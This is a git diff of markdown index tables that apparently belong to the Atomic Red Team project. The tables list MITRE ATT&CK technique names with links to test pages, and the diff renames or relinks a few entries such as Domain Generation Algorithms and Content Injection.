 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution: Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Device Driver Discovery](../../T1652/T1652.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Content Injection](../../T1659/T1659.md) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | [System Service Discovery](../../T1007/T1007.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Content Injection](../../T1659/T1659.md) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) |  | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Clipboard Data](../../T1115/T1115.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) |  | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |

atomics/Indexes/Matrices/matrix.md

@@ -3,19 +3,19 @@
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
 | [External Remote Services](../../T1133/T1133.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Process Injection: Extra Window Memory Injection](../../T1055.011/T1055.011.md) | [Process Injection: Extra Window Memory Injection](../../T1055.011/T1055.011.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | [Remote Services:VNC](../../T1021.005/T1021.005.md) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Management Instrumentation](../../T1047/T1047.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Container and Resource Discovery](../../T1613/T1613.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Phishing: Spearphishing Link](../../T1566.002/T1566.002.md) | [Server Software Component](../../T1129/T1129.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | [Remote Services: SSH](../../T1021.004/T1021.004.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Phishing: Spearphishing Link](../../T1566.002/T1566.002.md) | [Server Software Component](../../T1129/T1129.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | [Remote Services: SSH](../../T1021.004/T1021.004.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Dynamic Resolution: Domain Generation Algorithms](../../T1568.002/T1568.002.md) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Replication Through Removable Media](../../T1091/T1091.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping](../../T1003/T1003.md) | Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Cloud VM Connections [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lifecycle-Triggered Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Replication Through Removable Media](../../T1091/T1091.md) | [Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Group Policy Discovery](../../T1615/T1615.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SMS Pumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Supply Chain Compromise](../../T1195/T1195.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | [Device Driver Discovery](../../T1652/T1652.md) | [Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [External Remote Services](../../T1133/T1133.md) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Cloud Instance Metadata API](../../T1552.005/T1552.005.md) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol](../../T1071/T1071.md) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Access Software](../../T1219/T1219.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | ESXi Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
